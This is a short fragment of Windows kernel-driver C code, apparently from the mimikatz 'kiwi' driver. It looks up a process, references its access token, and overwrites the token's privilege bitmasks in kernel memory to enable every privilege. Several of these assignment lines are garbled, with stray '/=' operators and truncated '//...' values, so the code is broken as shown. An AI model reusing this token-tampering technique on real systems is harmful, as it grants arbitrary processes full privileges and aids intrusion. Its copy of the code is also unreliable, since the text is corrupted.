Initial upload 2014-04-06 18:31:53 +00:00			`status = PsLookupProcessByProcessId((HANDLE) *pPid, &pProcess);`
			`else`
			`pProcess = PsGetCurrentProcess();`

			`if(NT_SUCCESS(status) && pProcess)`
			`{`
			`if(pAccessToken = PsReferencePrimaryToken(pProcess))`
			`{`
			`status = kprintf(outBuffer, L"All privileges for the access token from %u/%-14S\n", PsGetProcessId(pProcess), PsGetProcessImageFileName(pProcess));`

			`pPrivileges = (PKIWI_NT6_PRIVILEGES) (((ULONG_PTR) pAccessToken) + EPROCESS_OffSetTable[KiwiOsIndex][TokenPrivs]);`
			`pPrivileges->Present[0] = pPrivileges->Enabled[0] /= pPrivileges->EnabledByDefault[0]/ = 0xfc;`
			`pPrivileges->Present[1] = pPrivileges->Enabled[1] /= pPrivileges->EnabledByDefault[1]/ = //...0xff;`
			`pPrivileges->Present[2] = pPrivileges->Enabled[2] /= pPrivileges->EnabledByDefault[2]/ = //...0xff;`
			`pPrivileges->Present[3] = pPrivileges->Enabled[3] /= pPrivileges->EnabledByDefault[3]/ = 0xff;`
			`pPrivileges->Present[4] = pPrivileges->Enabled[4] /= pPrivileges->EnabledByDefault[4]/ = 0x0f;`

			`PsDereferencePrimaryToken(pAccessToken);`
			`}`

			`if(pProcess != PsGetCurrentProcess())`
			`ObDereferenceObject(pProcess);`
			`}`
			`}`
			`else status = STATUS_NOT_SUPPORTED;`

			`return status;`
			`}`